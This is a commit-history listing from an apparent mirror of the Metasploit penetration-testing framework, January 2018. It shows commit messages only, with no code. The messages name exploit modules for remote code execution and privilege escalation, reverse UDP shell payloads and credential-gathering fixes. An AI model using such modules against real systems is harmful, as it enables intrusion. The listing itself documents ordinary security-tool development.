adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
46,254 Commits 27 Branches 1,043 Tags
94de5a4e42cfb1dc0fdfc1233707f71b6d9a628b
Commit Graph

23791 Commits

Author SHA1 Message Date
RageLtMan 721163bd67 Python shell via reverse UDP 
Python-based UDP egress shell, another PoC of the protocol used
as a raw transport.
 2018-01-23 02:00:56 -05:00
RageLtMan ef1d4ddb03 Add UDP handlers and payloads (redux) 
This is a repackaging effort for the work i originally pushed in
6035. This segment of the PR provides UDP session handlers for
bind and reverse sessions, a Windows Metasm stager (really the
TCP stager with a small change), and a pair of socat payloads for
testing simple UDP shells. Netcat or any scripting language with
a sockets library is sufficient to use these sessions as they are
stateless and simple.

Testing of this PR requires rex/core #1 and rex/socket #2

The SSL testing which was being done on 6035 is backed out, left
for a later time when we can do DTLS properly.
 2018-01-23 02:00:55 -05:00
Brent Cook 03d1523d43 Land #6611, add native DNS to Rex, MSF mixin, sample modules 2018-01-22 23:54:32 -06:00
Brent Cook a6e5944ec5 fix msftidy, add nicer errors on bind failure 2018-01-22 23:37:39 -06:00
Brent Cook aae77fc1a4 Land #9349, GoAhead LD_PRELOAD CGI Module 2018-01-22 23:10:36 -06:00
Pedro Ribeiro 621868b7fb Add CVE numbers 2018-01-23 11:26:39 +07:00
Brent Cook d1569f8280 Land #9413, Expand the number of class names searched when checking for an exploitable JMX server 2018-01-22 16:49:01 -06:00
Brent Cook 10fde42adc Land #9431, Fix owa_login to handle inserting credentials for a hostname 2018-01-22 16:46:39 -06:00
Brent Cook b12953fa85 Land #9404, update module author 2018-01-22 16:41:50 -06:00
Brent Cook 04d305feb3 update SSL Labs scanner with new API, be robust 
This updates the SSL Labs scanner to know about new additions to the API, and prevents the module from breaking again just because there is new JSON in the output. I couldn't figure out how to get the Api class to print messages normally, and there is some other output that needs to be added. But the module does work again.
 2018-01-22 16:32:16 -06:00
UnaPibaGeek ae93162faf HSTS eraser module 2018-01-22 18:53:16 -03:00
Wei Chen 394c31c1e3 Remove NoMethod Rescue for cerberus_sftp_enumusers 
Please see reasons in #9436
 2018-01-22 11:10:23 -06:00
Wei Chen 38d056b930 Land #9436 - Fix cerberus_sftp_enumusers undefined method start for nil 
Land #9436

Thanks Steve!
 2018-01-22 11:07:23 -06:00
Wei Chen 85d018096b Pass password_prompt and non_interactive to fix #8970 
Fix #8970
 2018-01-22 11:06:12 -06:00
Brent Cook 682c915a09 Land #9267, Add targets to sshexec 2018-01-22 09:59:48 -06:00
Pedro Ribeiro b734af4e79 Add my advisory URL 2018-01-22 22:00:48 +07:00
Pedro Ribeiro c1fe355329 Create exploit for AsusWRT LAN RCE 2018-01-22 21:44:02 +07:00
Brent Cook 69818aea22 update payload sizes 2018-01-21 08:03:07 -06:00
Pearce Barry 2a6b3671bf Add connection addr+port info to http response object. 
Update owa_login to use this instead of doing lookups on its own.
 2018-01-19 13:37:33 -06:00
Steve Embling 8f75d3a46b Possible fix to changes in net::ssh usage 2018-01-19 15:10:14 +00:00
Kevin Kirsche c7d3b5dfbb Update payload and disable check functionality 
The check functionality is broken as MSF cannot handle HttpServer and HttpClient at this time.

The payloads were updated to ensure CVE-2017-10271 is being exploited instead of CVE-2017-3506 as explained on https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/
 2018-01-18 13:26:44 -05:00
Brent Cook 7849743789 update stageless python sizes 2018-01-18 00:41:58 -06:00
Pearce Barry e9ce2374e5 Auto-resolve target if it's a hostname (owa_login). 
Ensures the module does save the creds which it claims to be saving.  See MS-2968.
 2018-01-17 16:47:21 -06:00
Aaron Soto 9328374155 Update 'author' field of metadata 2018-01-17 16:43:37 -06:00
Adam Cammack 0f0b116751 Rename scanner bits to avoid confusion 2018-01-17 14:46:31 -06:00
Aaron Soto 10cf327c26 Improve Hyper-V tests in checkvm 
All Win10 machines, physical and virtual, were being reported as 'Hyper-V' (false positives)

Added functionality to extract hostname of physical hypervisor from VM registry
 2018-01-17 14:29:03 -06:00
bwatters-r7 4c11eae774 Maybe that timeout is needed..... 2018-01-17 13:21:36 -06:00
Adam Cammack c7894f1d74 Split long lines and add comments 2018-01-17 12:04:12 -06:00
Philippe Tranca 35bec8d3cd Fixed classes names and added RMI interfaces 2018-01-17 17:10:36 +01:00
Philippe Tranca d345008b20 Added all the classes that implement RMI server 2018-01-17 17:03:32 +01:00
bwatters-r7 f439edfa1a Fixes by the fabled wvu 2018-01-17 08:20:52 -06:00
Brent Cook d6e966b079 Land #9414, wp_admin_shell_upload - remove plugin dir after exploitation 2018-01-16 21:08:22 -06:00
Adam Cammack 37bf68869f Add scanner for the open proxy from 'SharknAT&To' 2018-01-16 21:05:19 -06:00
Brendan Coles 5e11d36351 Add ABRT raceabrt Privilege Escalation module 2018-01-16 14:52:33 +00:00
attackdebris 1c156c3d3c Add powershell payload to module 2018-01-16 14:30:02 +00:00
Brendan Coles 4ade798cef Fix check for juju-run path 2018-01-16 07:19:48 +00:00
William Vu e5bd36da1c Land #9402, NIS bootparamd domain name disclosure 2018-01-15 15:36:00 -06:00
Daniel Teixeira aa9b5e4419 Sync Breeze Enterprise Import Command 2018-01-15 20:46:40 +00:00
Christian Mehlmauer 2f9eebe28b remove plugin dir 2018-01-15 14:48:59 +01:00
Philippe Tranca dfb9941e95 Fix java_jmx_server exploit 
Add test case when discovering RMI endpoint as the previous one was not complete
 2018-01-15 12:13:09 +01:00
Nicky Bloor 333ee893d3 Tidied up platform detection, check method, and minor typos. 2018-01-14 18:28:40 +00:00
Brendan Coles e1cbe4e906 Rename apport_chroot_priv_esc to apport_abrt_chroot_priv_esc 2018-01-14 08:33:43 +00:00
Brendan Coles c234d0523a Add support for abrt on Fedora 2018-01-14 08:33:10 +00:00
Brendan Coles c94763bfe0 Add Juju-run Agent Privilege Escalation module 2018-01-14 05:57:17 +00:00
William Vu 736d438813 Address second round of feedback 
Brain fart on guard clauses when I've been using them all this time...
Updating the conditions made the ternary fall out of favor.

Changed some wording in the doc to suggest the domain name for a
particular NIS server may be different from the bootparamd client's
configuration.
 2018-01-13 22:55:01 -06:00
Nicky Bloor 6568d29b67 Add BMC Server Automation RSCD Agent RCE exploit module. 2018-01-14 01:12:55 +00:00
William Vu 1a8eb7bf2a Update nis_ypserv_map after bootparam feedback 
Yes, yes, I see the off-by-one "error." It's more accurate this way.
Basically, we want to ensure there's actually data to dump.
 2018-01-13 15:40:17 -06:00
William Vu c080329ee6 Update module after feedback 
Looks like I can't decide on certain style preferences.

Not keen on using blank?, but I've used it before. Time to commit?

Also, fail_with has been fixed for aux and post since #8643. Use it!
 2018-01-13 15:40:11 -06:00
Brendan Coles 2f3e3b486a Use cross-compiled exploit 2018-01-13 05:44:42 +00:00
Brendan Coles d172259f5d umlaut 2018-01-13 16:06:11 +11:00